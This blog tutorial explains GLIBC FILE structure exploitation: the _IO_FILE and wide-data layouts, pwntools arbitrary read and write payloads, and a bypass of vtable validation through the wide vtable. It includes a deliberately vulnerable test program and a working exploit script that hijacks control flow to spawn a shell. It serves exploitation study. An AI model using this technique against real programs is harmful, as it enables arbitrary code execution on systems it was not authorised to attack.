Post

Introduction to File Structure Exploitation

Introduction to File Structure Exploitation

File Structure Exploitation is a binary exploitation technique that uses GLIBC file streams structures to gain code execution. It has become popular since pointers like __malloc_hook, __free_hook, etc. have been removed from GLIBC 2.34.

I was searching the internet on another way to get code execution of latest GLIBC versions, when i encountered it.

File Structure Exploitation

File structure exploitation is an advanced binary exploitation technique that leverages memory corruption vulnerabilities to overwrite a FILE pointer and manipulate the internal data structure used by standard I/O libraries to mange file streams.

Overview of the FILE Structure

In GLIBC the file structures were introduced to improve a program’s I/O performances through the use of buffering.

The file structure is a important component of that standard I/O library in C, representing a file stream.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
struct _IO_FILE
{
  int _flags;		/* High-order word is _IO_MAGIC; rest is flags. */
  /* The following pointers correspond to the C++ streambuf protocol. */
  char *_IO_read_ptr;	/* Current read pointer */
  char *_IO_read_end;	/* End of get area. */
  char *_IO_read_base;	/* Start of putback+get area. */
  char *_IO_write_base;	/* Start of put area. */
  char *_IO_write_ptr;	/* Current put pointer. */
  char *_IO_write_end;	/* End of put area. */
  char *_IO_buf_base;	/* Start of reserve area. */
  char *_IO_buf_end;	/* End of reserve area. */
  /* The following fields are used to support backing up and undo. */
  char *_IO_save_base; /* Pointer to start of non-current get area. */
  char *_IO_backup_base;  /* Pointer to first valid character of backup area */
  char *_IO_save_end; /* Pointer to end of non-current get area. */

  struct _IO_marker *_markers;
  struct _IO_FILE *_chain;
  int _fileno;
  int _flags2;
  __off_t _old_offset; /* This used to be _offset but it's too small.  */
  /* 1+column number of pbase(); 0 is unknown. */
  unsigned short _cur_column;
  signed char _vtable_offset;
  char _shortbuf[1];

  _IO_lock_t *_lock;
  
__off64_t _offset;
  /* Wide character stream stuff.  */
  struct _IO_codecvt *_codecvt;
  struct _IO_wide_data *_wide_data;
  struct _IO_FILE *_freeres_list;
  void *_freeres_buf;
  size_t __pad5;
  int _mode;
  /* Make sure we don't get into trouble again.  */
  char _unused2[15 * sizeof (int) - 4 * sizeof (void *) - sizeof (size_t)];
};

Opened file streams are joined in a singly linked list via the _chain field. This allows GLIBC to easily close them all on exit. The head of the linked list is _IO_list_all. GLIBC always has 3 file streams open which are stdin,stdout and stderr.

_flags is used to record the attribute of File stream such as read only, write, append and so on. It also shows the status of the file buffering status.

Stream buffer pointers are divided into three parts:

  1. Read buffer : _IO_read_ptr, _IO_read_end, _IO_read_base
  2. Write buffer :_IO_write_ptr, _IO_write_end, _IO_write_base
  3. Reserve buffer: _IO_buf_base, _IO_buf_end

Where the pointers point to:

  • **ptr points at the current buffer position.
  • **base points to the beginning of the buffer.
  • **end points to the end of the buffer.

_fileno is a file descriptor from the file which you open, it returns from the system call open.

The _lock pointer is used for threaded file access.

The _wide_data field points to a similar structure used to handle wide strings.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
/* Extra data for wide character streams.  */
struct _IO_wide_data
{
  wchar_t *_IO_read_ptr;	/* Current read pointer */
  wchar_t *_IO_read_end;	/* End of get area. */
  wchar_t *_IO_read_base;	/* Start of putback+get area. */
  wchar_t *_IO_write_base;	/* Start of put area. */
  wchar_t *_IO_write_ptr;	/* Current put pointer. */
  wchar_t *_IO_write_end;	/* End of put area. */
  wchar_t *_IO_buf_base;	/* Start of reserve area. */
  wchar_t *_IO_buf_end;		/* End of reserve area. */
  /* The following fields are used to support backing up and undo. */
  wchar_t *_IO_save_base;	/* Pointer to start of non-current get area. */
  wchar_t *_IO_backup_base;	/* Pointer to first valid character of
				   backup area */
  wchar_t *_IO_save_end;	/* Pointer to end of non-current get area. */

  __mbstate_t _IO_state;
  __mbstate_t _IO_last_state;
  struct _IO_codecvt _codecvt;

  wchar_t _shortbuf[1];

  const struct _IO_jump_t *_wide_vtable;
};

Then there is _IO_FILE_plus which is an extension of the FILE structure. It adds the virtual function table also called vtable.

1
2
3
4
5
6
7
8
9
10
11
/* We always allocate an extra word following an _IO_FILE.
   This contains a pointer to the function jump table used.
   This is for compatibility with C++ streambuf; the word can
   be used to smash to a pointer to a virtual function table. */

struct _IO_FILE_plus
{
  struct _IO_FILE file;
  const struct _IO_jump_t *vtable;
};

Default file streams (stdin, stdout, stderr) use this extended version. The purpose of using the extended version _IO_FILE_plus is to make IO operations faster by having the vtable.

To view this structure in GDB, we can use the ptype /o command.

The vtable field is a array of pointers to the helper functions during executing the IO operation. It is commonly found in C++ binaries. vtables allows for dynamic function resolution at runtime. The data type for the vtable is _IO_jump_t which stores the pointer to the needed IO helper methods.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
struct _IO_jump_t
{
    JUMP_FIELD(size_t, __dummy);
    JUMP_FIELD(size_t, __dummy2);
    JUMP_FIELD(_IO_finish_t, __finish);
    JUMP_FIELD(_IO_overflow_t, __overflow);
    JUMP_FIELD(_IO_underflow_t, __underflow);
    JUMP_FIELD(_IO_underflow_t, __uflow);
    JUMP_FIELD(_IO_pbackfail_t, __pbackfail);
    /* showmany */
    JUMP_FIELD(_IO_xsputn_t, __xsputn);
    JUMP_FIELD(_IO_xsgetn_t, __xsgetn);
    JUMP_FIELD(_IO_seekoff_t, __seekoff);
    JUMP_FIELD(_IO_seekpos_t, __seekpos);
    JUMP_FIELD(_IO_setbuf_t, __setbuf);
    JUMP_FIELD(_IO_sync_t, __sync);
    JUMP_FIELD(_IO_doallocate_t, __doallocate);
    JUMP_FIELD(_IO_read_t, __read);
    JUMP_FIELD(_IO_write_t, __write);
    JUMP_FIELD(_IO_seek_t, __seek);
    JUMP_FIELD(_IO_close_t, __close);
    JUMP_FIELD(_IO_stat_t, __stat);
    JUMP_FIELD(_IO_showmanyc_t, __showmanyc);
    JUMP_FIELD(_IO_imbue_t, __imbue);
};

Exploitation

This technique can be used to read and write arbitrary memory through the use of the _IO_read_base and _IO_write_base pointers. This technique can also lead to arbitrary code execution through vtable highjacking.

The pwntools library provides a

Arbitrary Write (Reading Data In)

Requirements

  • Set flag value
  • set read_ptr = read_end
  • set buf_base to address to write
  • set buf_end to address to write + length (end point)
  • buf_end - buf_base >= number of bytes to read

We use fread to read bytes from stdin to a buffer

1
2
3
4
FILE *fp = fopen("./flag.txt", "r");
read(0, fp, 0x100);
char buf[0x100];
fread(buf, 1, 10, fp);

Pwntools

1
2
3
4
addr = 0xdeadbeef # address to write
size = 0x10 # must be larger than bytes read on `fread`
fp = FileStructure()
payload = fp.read(addr, size)

Arbitrary Read (Writing Data Out)

Requirements

  • set flag value
  • set write_base to memory to write
  • set write_ptr to address to write+length
  • set read_end = write_base
  • buf_end - buf_base >= number of bytes to write

We use the fwrite function to write a buffer to stdout

1
2
3
FILE *fp = fopen("file", "w");
char buf[0x100];
fwrite(buf, 1, 40, fp);
1
2
3
4
addr = 0xdeadbeef # address to read
size = 0x10 # must be larger than bytes written on `fwrite`
fp = FileStructure()
payload = fp.write(addr, size)

vtable hijacking

Protections

Before looking at how to exploit this

The function _IO_validate_vtable() was added on GLIBC version 2.34 and does a couple of checks on the vtable:

  1. It checks whether the vtable in a section of memory where default vtables exist in libc. __libc_IO_vtables
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
/* Perform vtable pointer validation.  If validation fails, terminate
   the process.  */
static inline const struct _IO_jump_t *
IO_validate_vtable (const struct _IO_jump_t *vtable) {
  /* Fast path: The vtable pointer is within the __libc_IO_vtables
     section.  */
  uintptr_t section_length = __stop___libc_IO_vtables - __start___libc_IO_vtables;
  uintptr_t ptr = (uintptr_t) vtable;
  uintptr_t offset = ptr - (uintptr_t) __start___libc_IO_vtables;
  if (__glibc_unlikely (offset >= section_length))
    /* The vtable pointer is not in the expected section.  Use the
       slow path, which will terminate the process if necessary.  */
    _IO_vtable_check ();
  return vtable;
}
  • If it fails the check, it will run _IO_vtable_check() where it will compare the value of &IO_accept_foreign_vtables to that of &_IO_vtable_check, and will proceed if it is correct, otherwise it aborts.

  • This can be bypassed easily, because instead of replacing the vtable of _IO_FILE how about we replace the vtable of _IO_wide_data which is not checked through the _IO_validate_vtable().

    • Instead of replacing fp->vtable we replace fp->_wide_data->_wide_vtable which does not go through the same checks as the other one.
    • We can make GLIBC use fp->_wide_data->_wide_vtable by pointing fp->vtable to vtable structures that have special encodings like_IO_wfile_overflow.
    • Get arbitrary code exection.

Exploit

the vtable is full of function pointers which are needed for object oriented programming, if you can overwrite a function pointer inside the vtable of a file stream then trigger that function you can control the instruction pointer.

Create our own fake vtable, it can be placed anywhere. The place desired execution address at correct offset and then overwrite the vtable pointer in the _IO_File struct to point to our fake vtable.

_IO_lock_t pointer is used in multi-threaded programs to prevent race conditions. An exploit must set _IO_lock_t to point to:

  • writable location
  • with value NULL

Overwrite one of the functions in file._wide_data._wide_vtable that will be called.

If we modify the vtable pointer to something like _IO_wXXXX_jumps, the GLIBC considers it as the wide-character stream and triggers _IO_wfile_overflow. If we can make _wide_data point to our fake _wide_data IO_FILE_plus struct, which then has a _wide_vtable pointing to our exploit_vtable

wide_data also contains its own vtable, const struct _IO_jump_t *_wide_vtable;

Usage

  1. Setup exploit_vtable a fake vtable
  2. setup file.wide_data->vtable pointing to the custom exploit_vtable.
  3. Overrides FILE.vtable such that IO_wfile_overflow gets called.
  4. IO_wfile_overflow then calls do_allocbuf
  5. do_allocbuf then calls file.wide_data->_wide_vtable.

fwrite -> _IO_wfile_overflow -> _IO_wdoallocbuf -> <target addr> (win)

When space is limited, structs can be overlapped as long as the offsets accessed return reasonable values.

glibc_2.36

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

void win() {
	puts("You WIN");
	system("/bin/sh");
}
int main() {
	setbuf(stdout, NULL);
	setbuf(stdin, NULL);
	setbuf(stderr, NULL);
	
	printf("win @ %p\nputs @ %p\n", win, puts);

	FILE *fp = fopen("/dev/null", "w");

	char buf[0x1000];
	printf("reading into buf @ %p\n", buf);
	read(0, buf, 0x1000);
	printf("reading into fp: ");
	read(0, fp, 0x1000);

	puts("calling fwrite");
	fwrite(buf, 1, 10, fp);
	exit(0);
}

exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
def exploit():
	##################################################################### 
	######################## EXPLOIT CODE ###############################
	#####################################################################
	ru(b"@ ")
	win = int(rl(), 16)
	ru(b"@ ")
	puts = int(rl(), 16)
	libc.address = 0x00007ffff7dc3000#puts - libc.sym['puts']
	
	ru(b"@ ")
	buf = int(rl(), 16)

	print_leak("win", win)
	print_leak("puts", puts)
	print_leak("libc base addr", libc.address)
	print_leak("stack buf", buf)

	exploit_vtable = p64(0)*13 + p64(win)
	wide_data = p64(0)*0x1c + p64(buf+0xe8)
	"""
	wide_data {
	...
	_wide_vtable = wide_data+0xe0; (exploit_vtable)
	}
	
	exploit_vtable {
	... 
	win
	}
	"""
	sl(wide_data + exploit_vtable)
	fp  = FileStructure(null = buf)
	fp.vtable = libc.sym._IO_wfile_jumps # must be within __libc_IO_vtables
	fp._wide_data = buf
	sla(b"fp: ", bytes(fp))

When a program does not have any FILE IO operations File Structure exploitation can be still used.

  1. _IO_list_all Highjacking: By overwriting the _IO_list_all with a pointer to a fake _IO_FILE_plus structure, the next I/O operation will trigger this fake structure to be used, giving control over to vtable.
    • To trigger the next I/O operation you will need to call exit() so that _IO_flush_lock the GLIBC will try to cleanup and use these

Different Exploitation Techniques Using File Structure Exploitation

References

This post is licensed under CC BY 4.0 by the author.